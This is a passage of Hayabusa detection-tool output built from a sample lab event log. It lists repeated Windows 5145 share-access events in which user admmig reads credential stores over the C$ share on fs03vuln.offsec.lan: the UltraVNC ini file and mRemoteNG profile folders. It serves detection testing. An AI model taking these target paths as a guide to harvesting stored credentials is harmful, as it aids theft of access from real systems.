Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.264 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.264 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.264 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.280 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.280 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.280 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via 
network share.evtx +2021-12-12 11:53:30.295 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.295 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.295 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.311 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.311 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.311 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.327 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.327 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.327 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.343 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.343 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.343 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.359 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.359 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.359 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.374 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.390 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.390 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.390 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.406 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.406 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.406 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.422 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.422 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.422 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.437 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.453 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.453 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.453 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.468 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.468 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.468 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.484 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.505 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.507 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.507 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP 
Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.507 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.523 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 